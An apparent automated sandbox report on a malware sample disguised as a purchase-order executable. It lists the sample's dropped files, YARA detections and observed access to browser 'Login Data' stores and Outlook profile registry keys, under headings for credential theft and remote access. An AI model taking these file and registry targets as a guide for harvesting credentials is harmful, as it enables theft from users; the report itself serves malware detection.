                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeQueries volume information: C:\Users\user\AppData\Roaming\zeXKjViL.exe VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                          Source: C:\Windows\System32\alg.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\AppVClient.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Microsofts.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                          Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TSTFD83.tmp VolumeInformation
                          Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TSTFD94.tmp VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,8_2_00412A15
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BF8550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,FreeSid,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,8_2_02BF8550
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.0.Microsofts.exe.200000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: PO_2024_056209_MQ04865_ENQ_1045.exe PID: 8160, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 2124, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49a6478.13.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49a6478.13.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3573f56.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.5ae0000.14.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49a5570.8.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3574e5e.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3573f56.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3574e5e.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49e3d90.9.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49a5570.8.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3700f08.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3700000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49e3d90.9.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.5ae0000.14.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3700000.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3700f08.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000008.00000002.1769417350.0000000003700000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000002.1793222374.00000000049A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000002.1758588393.0000000003533000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000002.1798563262.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.0.Microsofts.exe.200000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: PO_2024_056209_MQ04865_ENQ_1045.exe PID: 8160, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 2124, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.0.Microsofts.exe.200000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.2962626553.0000000002633000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: PO_2024_056209_MQ04865_ENQ_1045.exe PID: 8160, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 2124, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.0.Microsofts.exe.200000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: PO_2024_056209_MQ04865_ENQ_1045.exe PID: 8160, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 2124, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
